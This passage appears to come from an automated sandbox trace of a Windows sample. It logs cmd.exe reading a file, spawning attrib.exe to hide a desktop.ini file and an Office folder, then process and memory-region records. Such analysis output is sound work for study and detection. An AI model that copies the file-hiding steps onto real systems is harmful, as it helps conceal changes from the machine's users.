lpOverlapped=0x0) returned 1 [0163.028] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, 
lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.028] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.028] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.028] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.028] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.028] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.028] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.028] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.029] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.029] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.029] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.029] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.029] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.029] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.029] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.029] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.029] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.029] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.030] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.030] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.030] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.030] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.030] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.030] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.030] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.031] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.031] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.031] ReadFile (in: hFile=0x58, 
lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.031] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.031] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.031] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.031] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.031] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.031] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.031] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.032] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.032] ReadFile 
(in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.032] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.032] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.032] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.072] _close (_FileHandle=4) returned 0 [0163.072] FindNextFileW (in: hFindFile=0x382810, lpFindFileData=0x22f000 | out: lpFindFileData=0x22f000) returned 0 [0163.072] GetLastError () returned 0x12 [0163.072] FindClose (in: hFindFile=0x382810 | out: hFindFile=0x382810) returned 1 [0163.073] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0163.076] _close (_FileHandle=3) returned 0 [0163.076] GetConsoleTitleW (in: lpConsoleTitle=0x22f438, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0163.077] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0163.077] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0163.077] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0163.077] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, 
lpFindFileData=0x22ecd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ecd4) returned 0xffffffff [0163.077] GetLastError () returned 0x2 [0163.077] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x22ecd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ecd4) returned 0xffffffff [0163.077] GetLastError () returned 0x2 [0163.077] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x22ecd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ecd4) returned 0x382e80 [0163.077] FindClose (in: hFindFile=0x382e80 | out: hFindFile=0x382e80) returned 1 [0163.078] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x22ecd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ecd4) returned 0xffffffff [0163.078] GetLastError () returned 0x2 [0163.078] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x22ecd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ecd4) returned 0x382e80 [0163.078] FindClose (in: hFindFile=0x382e80 | out: hFindFile=0x382e80) returned 1 [0163.078] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0163.078] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0163.078] GetConsoleTitleW (in: lpConsoleTitle=0x22f1cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0163.078] InitializeProcThreadAttributeList (in: lpAttributeList=0x22f054, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22f11c | out: lpAttributeList=0x22f054, lpSize=0x22f11c) returned 1 [0163.078] UpdateProcThreadAttribute (in: lpAttributeList=0x22f054, dwFlags=0x0, Attribute=0x60001, lpValue=0x22f114, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: 
lpAttributeList=0x22f054, lpPreviousValue=0x0) returned 1 [0163.078] GetStartupInfoW (in: lpStartupInfo=0x22f010 | out: lpStartupInfo=0x22f010*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0163.078] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0163.078] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22f0b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22f0fc | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" ", lpProcessInformation=0x22f0fc*(hProcess=0x4c, hThread=0x50, dwProcessId=0x908, dwThreadId=0xd88)) returned 1 [0163.080] CloseHandle (hObject=0x50) returned 1 [0163.080] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0163.080] GetEnvironmentStringsW () returned 0x382e80* [0163.080] FreeEnvironmentStringsW (penv=0x382e80) returned 1 [0163.080] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0163.129] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x22eff0 | out: lpExitCode=0x22eff0*=0x0) returned 1 [0163.129] CloseHandle 
(hObject=0x4c) returned 1 [0163.129] _vsnwprintf (in: _Buffer=0x22f138, _BufferCount=0x13, _Format="%08X", _ArgList=0x22effc | out: _Buffer="00000000") returned 8 [0163.129] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0163.129] GetEnvironmentStringsW () returned 0x382e80* [0163.129] FreeEnvironmentStringsW (penv=0x382e80) returned 1 [0163.129] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0163.130] GetEnvironmentStringsW () returned 0x382e80* [0163.130] FreeEnvironmentStringsW (penv=0x382e80) returned 1 [0163.130] DeleteProcThreadAttributeList (in: lpAttributeList=0x22f054 | out: lpAttributeList=0x22f054) [0163.130] GetConsoleTitleW (in: lpConsoleTitle=0x22f438, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0163.130] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0163.130] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0163.130] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0163.130] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x22ecd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ecd4) returned 0xffffffff [0163.131] GetLastError () returned 0x2 [0163.131] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x22ecd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ecd4) returned 0xffffffff [0163.131] GetLastError () returned 0x2 [0163.131] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x22ecd4, fSearchOp=0x0, 
lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ecd4) returned 0x382810 [0163.131] FindClose (in: hFindFile=0x382810 | out: hFindFile=0x382810) returned 1 [0163.131] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x22ecd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ecd4) returned 0xffffffff [0163.131] GetLastError () returned 0x2 [0163.131] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x22ecd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ecd4) returned 0x382810 [0163.131] FindClose (in: hFindFile=0x382810 | out: hFindFile=0x382810) returned 1 [0163.131] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0163.131] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0163.131] GetConsoleTitleW (in: lpConsoleTitle=0x22f1cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0163.131] InitializeProcThreadAttributeList (in: lpAttributeList=0x22f054, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22f11c | out: lpAttributeList=0x22f054, lpSize=0x22f11c) returned 1 [0163.131] UpdateProcThreadAttribute (in: lpAttributeList=0x22f054, dwFlags=0x0, Attribute=0x60001, lpValue=0x22f114, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22f054, lpPreviousValue=0x0) returned 1 [0163.131] GetStartupInfoW (in: lpStartupInfo=0x22f010 | out: lpStartupInfo=0x22f010*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0163.132] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0163.132] CreateProcessW (in: 
lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22f0b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22f0fc | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\"", lpProcessInformation=0x22f0fc*(hProcess=0x50, hThread=0x4c, dwProcessId=0xea8, dwThreadId=0xf3c)) returned 1 [0163.133] CloseHandle (hObject=0x4c) returned 1 [0163.133] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0163.133] GetEnvironmentStringsW () returned 0x3838e0* [0163.133] FreeEnvironmentStringsW (penv=0x3838e0) returned 1 [0163.133] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0163.170] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x22eff0 | out: lpExitCode=0x22eff0*=0x0) returned 1 [0163.170] CloseHandle (hObject=0x50) returned 1 [0163.170] _vsnwprintf (in: _Buffer=0x22f138, _BufferCount=0x13, _Format="%08X", _ArgList=0x22effc | out: _Buffer="00000000") returned 8 [0163.170] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0163.170] GetEnvironmentStringsW () returned 0x3838e0* [0163.170] FreeEnvironmentStringsW (penv=0x3838e0) returned 1 [0163.170] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0163.170] GetEnvironmentStringsW () returned 0x3838e0* [0163.170] FreeEnvironmentStringsW (penv=0x3838e0) returned 1 [0163.170] DeleteProcThreadAttributeList (in: 
lpAttributeList=0x22f054 | out: lpAttributeList=0x22f054) [0163.170] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.170] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0163.171] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.171] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0163.171] _get_osfhandle (_FileHandle=0) returned 0x3 [0163.171] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0163.171] SetConsoleInputExeNameW () returned 0x1 [0163.171] GetConsoleOutputCP () returned 0x1b5 [0163.171] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0163.171] SetThreadUILanguage (LangId=0x0) returned 0x409 [0163.171] exit (_Code=0) Process: id = "281" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16920" os_pid = "0x720" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "280" os_parent_pid = "0xef8" cmd_line = "attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22516 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22517 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22518 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type 
= pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22519 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 22520 start_va = 0xb60000 end_va = 0xb66fff entry_point = 0xb60000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 22521 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22522 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22523 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22524 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 22525 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22526 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22527 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22528 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 22529 start_va = 0x1f0000 end_va = 0x256fff entry_point = 0x1f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" 
(normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22530 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 22531 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 22532 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22533 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = 